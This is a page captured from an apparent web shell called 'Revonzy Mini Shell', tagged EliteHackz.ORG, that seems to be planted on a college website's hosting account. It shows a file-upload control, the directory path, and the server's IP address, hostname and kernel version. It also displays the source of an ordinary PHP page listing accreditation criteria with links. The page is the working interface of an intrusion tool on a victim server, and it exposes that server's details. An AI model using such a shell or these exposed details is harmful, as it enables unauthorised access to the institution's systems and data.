Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/qualitative.php

<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();

	// $staff_details	=	$db->get_teaching_staff();
	
	$chapter    =   0;
	
	if(isset($_GET['chapter']))
	{
	    $chapter    =   $_GET['chapter'];
	}
?>
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />


<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
<script src="js/jquery-1.7.min.js"></script>
<script src="js/jquery.easing.1.3.js"></script>
<script src="js/tms-0.4.1.js"></script>
   
	<style>
	
	
.zoomin img 
{ 
margin-left:240px;
 height: 200px; width: 200px;
 -webkit-transition: all 2s ease; -moz-transition: all 2s ease;
 -ms-transition: all 2s ease; 
 transition: all 2s ease;
 }
.zoomin img:hover {
 width: 300px;
 height: 300px;
 }
 @-webkit-keyframes swinging{
    0%{-webkit-transform: rotate(10deg);}
    50%{-webkit-transform: rotate(-5deg)}
    100%{-webkit-transform: rotate(10deg);}
}
 
@keyframes swinging{
    0%{transform: rotate(10deg);}
    50%{transform: rotate(-5deg)}
    100%{transform: rotate(10deg);}
}
 
.swingimage{
    -webkit-transform-origin: 50% 0;
    transform-origin: 50% 0;
    -webkit-animation: swinging 3.5s ease-in-out forwards infinite;
    animation: swinging 3.5s ease-in-out forwards infinite;
}
.element {
  height:200px;
  width: 200px;
  margin: 0 auto;
 
  animation-name: stretch;
  animation-duration: 1.5s; 
  animation-timing-function: ease-out; 
  animation-delay: 0;
  animation-direction: alternate;
  animation-iteration-count: infinite;
  animation-fill-mode: none;
  animation-play-state: running;
}

@keyframes stretch {
  0% {
    transform: scale(.3);
    
    border-radius: 100%;
  }
  5% {
    
  }
  20% {
    transform: scale(1.5);
    
  }
}
</style>

</head>
<body>
	<?php
		require_once("lib/header.php");
	?>
	
	<style>
	#slideshow {
  margin: 80px auto;
  position: relative;
  width: 1080px;
  height: 440px;
  padding: 10px;
  box-shadow: 0 0 20px rgba(0, 0, 0, 0.4);
  margin:auto;
  z-index:0;
}

#slideshow > div {
  position: absolute;
  top: 10px;
  left: 10px;
  right: 10px;
  bottom: 10px;
  z-index:0;
}
.img_slide_n
{
	width:1080px;
	z-index:0;
}
.img_slide_n img{
	width:1080px;
	height:100%;
	z-index:0;
}
</style>
<script>
$("#slideshow > div:gt(0)").hide();

setInterval(function() {
  $('#slideshow > div:first')
    .fadeOut(1000)
    .next()
    .fadeIn(1000)
    .end()
    .appendTo('#slideshow');
}, 3000)
</script>

<div class="main_container" style="min-height:1400px;background-color:white;">

			<?php
				require_once("highlights.php");
			?>

			<div class="data_container" style="margin-top:16px;">
			    
			    
	<style>
	    th
	    {
	        color:#FFFFFF;
	        text-align:center;
	    }
	    .mn_pg_title
	    {
	        color:#0070C0;
	        font-weight:bold;
	    }
	    td
	    {
	        text-align:left !important;
	        font-size:14px;
	        color:#333333;
	    }
	</style>
	
	<?php
	
	    if($chapter==1)
	    {
	?>
	
	<h4 class="mn_pg_title"> Criterion 1 – Curricular Aspects</h4>
	<br />
    <table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
      <tr>
	<td>1.1.1</td><td>The institution ensures effective curriculum delivery through a well planned and documented process </td>
	<td><a href="display.php?cht=1.1.1&table=two">View</a></td>
</tr>
<tr>
	<td>1.3.1</td><td>Institution integrates cross cutting issues relevant to Gender, Environment and Sustainability, Human Values and Professional Ethics into the Curriculum</td>
	<td><a href="display.php?cht=1.3.1&table=two">View</a></td>
</tr>
    </tbody>
  </table>
			    
    <br /><br />
    
    <?php
	    }
	    
	    if($chapter==2)
	    {
    ?>
		  
	<h4 class="mn_pg_title">Criterion 2 – Teaching-Learning and Evaluation</h4>		    
	<br />
	<table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
      <tr>
	<td>2.2.1</td><td>The institution assesses the learning levels of the students, after admission and organises special programs for advanced learners and slow learners</td>
<td><a href="display.php?cht=2.2.1&table=two">View</a></td>
</tr>
<tr>
	<td>2.3.1</td><td>Student centric methods, such as experiential learning, participative learning and problem solving methodologies are used for enhancing learning experiences</td>
	<td><a href="display.php?cht=2.3.1&table=two">View</a></td>
</tr>
<tr>
	<td>2.3.4</td><td>Innovation and creativity in teaching-learning </td>
	<td><a href="display.php?cht=2.3.4&table=two">View</a></td>
</tr>
<tr>
	<td>2.5.1</td><td>Reforms in Continuous Internal Evaluation(CIE) system at the institutional level 	</td>
	<td><a href="display.php?cht=2.5.1&table=two">View</a></td>
</tr>
<tr>
	<td>2.5.2</td><td>Mechanism of internal assessment is transparent and robust in terms of frequency and variety </td>
	<td><a href="display.php?cht=2.5.2&table=two">View</a></td>
</tr>
<tr>
	<td>2.5.3</td><td>Mechanism to deal with examination related grievances is transparent, time-bound and efficient </td>
<td><a href="display.php?cht=2.5.3&table=two">View</a></td>
</tr>
<tr>
	<td>2.5.4</td><td>The institution adheres to the academic calendar for the conduct of CIE </td>
	<td><a href="display.php?cht=2.5.4&table=two">View</a></td>
</tr>
<tr>
	<td>2.6.1</td><td>Program outcomes, program specific outcomes and course outcomes for all programs offered by the institution are stated and displayed on website and communicated to teachers and students 	</td>
	<td><a href="display.php?cht=2.6.1&table=two">View</a></td>
	</tr>
<tr>
	<td>2.6.2</td><td>Attainment of program outcomes, program specific outcomes and course outcomes are evaluated by the institution </td>
	<td><a href="display.php?cht=2.6.2&table=two">View</a></td>
</tr>
    </table>
	
	<?php
	    }
	    
	    if($chapter==3)
	    {
    ?>
	
	<br /><br />
		  
	<h4 class="mn_pg_title">Criterion 3 – Research, Innovations and Extension.</h4>		    
	<br />
	<table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
      <tr>
	<td>3.2.1</td><td>Institution has created an eco system for innovations including Incubation centre and other initiatives for creation and transfer of knowledge </td>
	<td><a href="display.php?cht=3.2.1&table=two">View</a></td>
</tr>
<tr>
	<td>3.4.1</td><td>Extension activities in the neighbourhood community in terms of impact and sensitising students to social issues and holistic development during the last five years  </td>
	<td><a href="display.php?cht=3.4.1&table=two">View</a></td>
</tr>
</table>
<br /><br />
<?php
	    }
	    
	    if($chapter==4)
	    {
    ?>
		  
	<h4 class="mn_pg_title">Criterion 4 – Infrastructure and Learning Resources</h4>		    
	<br />
	<table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
     <tr>
	<td>4.1.1</td><td>The institution has adequate facilities for teaching – learning, viz., classrooms, laboratories, computing equipment, etc.  </td>
	<td><a href="display.php?cht=4.1.1&table=two">View</a></td>
</tr>
<tr>
	<td>4.1.2</td><td>The institution has adequate facilities for sports, games (indoor, outdoor, gymnasium, yoga centre etc.,) and cultural activities  </td>
	<td><a href="display.php?cht=4.1.2&table=two">View</a></td>
</tr>
<tr>
	<td>4.2.1</td><td>Library is automated using Integrated Library Management System (ILMS) </td>
	<td><a href="display.php?cht=4.2.1&table=two">View</a></td>
</tr>
<tr>	
	<td>4.2.2</td><td>Collection of rare books, manuscripts, special reports or any other knowledge resource for library enrichment </td>
	<td><a href="display.php?cht=4.2.2&table=two">View</a></td>
</tr>
<tr>
	<td>4.3.1</td><td>Institution frequently updates its IT facilities including Wi-Fi  </td>
	<td><a href="display.php?cht=4.3.1&table=two">View</a></td>
</tr>
<tr>
	<td>4.4.2</td><td>There are established systems and procedures for maintaining and utilizing physical, academic and support facilities - laboratory, library, sports complex, computers, classrooms etc.  </td>
	<td><a href="display.php?cht=4.4.2&table=two">View</a></td>
</tr>
</table>


<br /><br />

<?php
	    }
	    
	    if($chapter==5)
	    {
    ?>
		  
	<h4 class="mn_pg_title">Criterion 5 - Student Support and Progression </h4>		    
	<br />
	<table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
     <tr>
	<td>5.3.2</td><td>Presence of an active Student Council & representation of students on academic & administrative bodies/committees of the institution </td>
	<td><a href="display.php?cht=5.3.2&table=two">View</a></td>
</tr>
<tr>
	<td>5.4.1</td><td>The Alumni Association/Chapters (registered and functional)contributes significantly to the development of the institution through financial and non financial means during the last five years </td>
	<td><a href="display.php?cht=5.4.1&table=two">View</a></td> 
</tr>
</table>

<br /><br />

<?php
	    }
	    
	    if($chapter==6)
	    {
    ?>
		  
	<h4 class="mn_pg_title">Criterion 6 - Governance, Leadership and Management</h4>		    
	<br />
	<table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
     <tr>
	<td>6.1.1</td><td>The governance of the institution is reflective of an effective leadership in tune with the vision and mission of the Institution 
	</td>
	<td><a href="display.php?cht=6.1.1&table=two">View</a></td>
</tr>
<tr>	
	<td>6.1.2</td><td>The institution practices decentralization and participative management 
	</td>
	<td><a href="display.php?cht=6.1.2&table=two">View</a></td>
</tr>
<tr>
	<td>6.2.1</td><td>Perspective/Strategic plan and deployment documents are available in the institution 
	</td>
	<td><a href="display.php?cht=6.2.1&table=two">View</a></td>
</tr>
<tr>
	<td>6.2.2</td><td>Organizational structure of the Institution including governing body, administrative setup, and functions of various bodies, service rules, procedures, recruitment, promotional policies as well as grievance redressal mechanism 
	</td>
	<td><a href="display.php?cht=6.2.2&table=two">View</a></td>
</tr>
<tr>
	<td>6.2.4</td><td>Effectiveness of various bodies/cells/committees is evident through minutes of meetings and implementation of their resolutions 
	</td>
	<td><a href="display.php?cht=6.2.4&table=two">View</a></td>
</tr>
<tr>
	<td>6.3.1</td><td>The institution has effective welfare measures for teaching and non-teaching staff  </td>
	<td><a href="display.php?cht=6.3.1&table=two">View</a></td>
</tr>
<tr>
	<td>6.3.5</td><td>Institution has Performance Appraisal System for teaching and non-teaching staff 
	</td>
	<td><a href="display.php?cht=6.3.5&table=two">View</a></td>
</tr>
<tr>
	<td>6.4.1</td><td>Institution conducts internal and external financial audits regularly 
	</td>
	<td><a href="display.php?cht=6.4.1&table=two">View</a></td>
</tr>
<tr>
	<td>6.4.3</td><td>Institutional strategies for mobilisation of funds and the optimal utilisation of resources 
	</td>
	<td><a href="display.php?cht=6.4.3&table=two">View</a></td>
</tr>
<tr>
	<td>6.5.1</td><td>Internal Quality Assurance Cell (IQAC) has contributed significantly for institutionalizing the quality assurance strategies and processes 
	</td>
	<td><a href="display.php?cht=6.5.1&table=two">View</a></td>
</tr>
<tr>
	<td>6.5.2</td><td>The institution reviews its teaching learning process, structures & methodologies of operations and learning outcomes at periodic intervals through IQAC set up as per norms 
	</td>
	<td><a href="display.php?cht=6.5.2&table=two">View</a></td>
</tr>
<tr>
	<td>6.5.5</td><td>Incremental improvements made during the preceding five years. 
	</td>
	<td><a href="display.php?cht=6.5.5&table=two">View</a></td>
</tr>
</table>


<br /><br />
	<?php
	    }
	    
	    if($chapter==7)
	    {
    ?>
    
	<h4 class="mn_pg_title">Criterion -7 Institutional Values and Best Practices</h4>		    
	<br />
	<table class="table table-bordered">
    <thead style="background-color:#0070C0">
      <tr>
        <th width="65">Sr. No.</th>
        <th width="300">Metric   Question</th>
        <th width="70">Link</th>
      </tr>
    </thead>
    <tbody>
        <tr>
	<td>7.1.2</td><td>Instituion shows gender sensitivity in providing facilities<br />
 </td>
 <td><a href="display.php?cht=7.1.2&table=two">View</a></td>
</tr>
<tr>
	<td>7.1.5</td><td>Waste management steps<br />
 </td><td><a href="display.php?cht=7.1.5&table=two">View</a></td>
</tr>
<tr>
	<td>7.1.6</td><td>Rain water harvesting structure and utilization in the campus<br />
 </td><td><a href="display.php?cht=7.1.6&table=two">View</a></td>
</tr>
<tr>
	<td>7.1.7</td><td>Green Practices<br />
 </td><td><a href="display.php?cht=7.1.7&table=two">View</a></td>
</tr>
<tr>
	<td>7.1.18</td><td>Institution organizes national festivals and birth/death anniversaries of the great Indian personalitites<br />
 </td><td><a href="display.php?cht=7.1.18&table=two">View</a></td>
</tr>

<tr>
	<td>7.1.19</td><td>the institution maintenance complete transparency in its financial, academic, administrative and auxiliary functions<br />
 </td><td><a href="display.php?cht=7.1.19&table=two">View</a></td>
</tr>

<tr>
	<td>7.2.1</td><td>Describe at least two instituional best practices
 </td><td><a href="display.php?cht=7.2.1&table=two">View</a></td>
</tr>

<tr>
	<td>7.3.1</td><td>Describe/Explain the performance of the institution in one area distinctive to its vision, priority and thrust
 </td><td><a href="display.php?cht=7.3.1&table=two">View</a></td>
</tr>
</tbody>
</table>
    <?php
	    }
    ?>

		</div>
		
		<?php
		require_once("lib/footer.php");
	?>
	    </body>
</html>

    	
    	

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4